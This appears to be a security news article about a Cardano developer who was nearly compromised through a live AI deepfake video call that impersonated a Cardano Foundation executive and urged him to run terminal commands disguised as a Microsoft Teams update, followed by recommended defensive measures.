Cardano Developer Warns After AI Deepfake Breaches Laptop

A Cardano ecosystem developer, known as Big Pey, narrowly avoided a full compromise after joining a live video call that used AI-generated deepfake video and voice to impersonate a Cardano Foundation executive. The caller instructed him to run an update via the Microsoft Teams client using terminal commands, which likely would have installed malware. The developer's laptop lost power mid-update, likely halting the attack. Multiple other crypto professionals reported near-identical targeting, indicating a coordinated social-engineering campaign leveraging compromised accounts, Calendly invites, and Telegram messages. The incident underscores escalating risks to developers and infrastructure from highly convincing deepfakes and illustrates a practical vector that operational security teams must mitigate now.
What happened
A Cardano ecosystem developer, Big Pey, joined a scheduled call that convincingly impersonated Pierre Kaklamanos, Head of Digital Assets Adoption at the Cardano Foundation, using AI-generated video and voice. The call presented multiple realistic participants and a Microsoft Teams prompt claiming the client needed an update installed via terminal commands. The developer executed the command but his laptop powered off when the battery died, likely interrupting the payload installation. Within hours other crypto professionals, including staff at DWF Labs and contacts amplified by Changpeng Zhao, reported near-identical attempts.
Technical details
The attack chain combined account compromise, social engineering, and live deepfake rendering. Key observable elements were:
- •Initial contact through a previously trusted, now-compromised account, often followed by a Calendly invite or direct Telegram message.
- •A live video call using AI-driven face and voice synthesis to impersonate a known executive, plus staged additional participants to increase legitimacy.
- •An instruction to run an update via the Microsoft Teams client using terminal commands, the likely vector for deploying remote access tools or persistence mechanisms.
Context and significance
This is a concrete evolution from recorded deepfakes to synchronous impersonation used in active compromise attempts. The technique removes many of the traditional red flags: visual familiarity, voice, and conversational context. FBI data from 2025 highlighted escalating losses: $20.9 billion in internet fraud with $893 million tied to AI-enabled scams, framing this incident as part of a larger trend. For crypto ecosystems, where key material and developer machines are high-value targets, the risk model changes: trust-of-identity checks and endpoint hygiene are no longer sufficient without procedural guards.
What to watch
Operational mitigations should be prioritized: enforce verification protocols for voice/video invites, ban execution of unvetted commands during live calls, require ephemeral VM or air-gapped devices for critical key operations, and accelerate multi-channel identity verification. Watch for similar campaigns targeting other blockchain teams and for tooling that simplifies live deepfake generation, which will lower attacker costs and increase frequency.
"Moral of the story, be careful. Trust nothing, trust no one," warned Big Pey, reflecting a simple but urgent operational posture shift for developers and security teams.
Scoring Rationale
This incident demonstrates a notable escalation in attacker capabilities: live, synchronous deepfakes used to target developers and deploy malware. It is operationally significant for security teams and crypto projects but not yet a systemic industry paradigm shift.
Practice with real FinTech & Trading data
90 SQL & Python problems · 15 industry datasets
250 free problems · No credit card
See all FinTech & Trading problems


